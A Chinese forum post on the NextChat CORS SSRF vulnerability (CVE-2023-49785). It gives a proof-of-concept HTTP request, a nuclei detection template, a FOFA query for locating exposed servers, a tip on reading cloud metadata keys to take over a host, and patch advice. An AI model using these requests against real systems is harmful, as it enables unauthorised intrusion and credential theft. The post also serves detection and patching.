NextChat cors SSRF漏洞 (CVE-2023-49785)

我是大白   ·   发表于 2024-03-14 20:26:41   ·   漏洞文章

NextChat cors SSRF漏洞 (CVE-2023-49785)

漏洞描述

NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。

tips:结合云主机的特点,可通过ssrf访问云主机元数据,例如读取AK/SK,实现云主机接管。

产品界面

fofa语法

title="NextChat"

POC

  1. GET /api/cors/https/www.baidu.com HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
  4. (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
  5. Connection: close
  6. Accept: */*
  7. Accept-Language: en
  8. Accept-Encoding: gzip

nuclei验证

  1. id: CVE-2023-49785
  2. info:
  3. name: NextChat cors SSRF漏洞 CVE-2023-49785
  4. author: nobody
  5. severity: high
  6. description: |
  7. NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。
  8. 20243月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在
  9. 无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
  10. impact: |
  11. 攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等.
  12. remediation: |
  13. 升级版本,打补丁
  14. metadata:
  15. verified: true
  16. max-request: 3
  17. fofa-query: title="NextChat"
  18. tags: ai,gpt,nextchat,ssrf
  19. 修复建议
  20. 建议升级到最新版本或打补丁
  21. 非必要禁止公网访问或白名单访问
  22. requests:
  23. - raw:
  24. - |
  25. GET /api/cors/https/www.baidu.com HTTP/1.1
  26. Host: {{Hostname}}
  27. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
  28. AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0
  29. Safari/537.36
  30. Connection: close
  31. Accept: */*
  32. Accept-Language: en
  33. Accept-Encoding: gzip
  34. matchers:
  35. - type: dsl
  36. dsl:
  37. - status_code == 200 && contains_all(body,"京ICP证030173
  38. 号")

修复建议

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问

打赏我,让我更有动力~

0 条回复   |  直到 9个月前 | 611 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.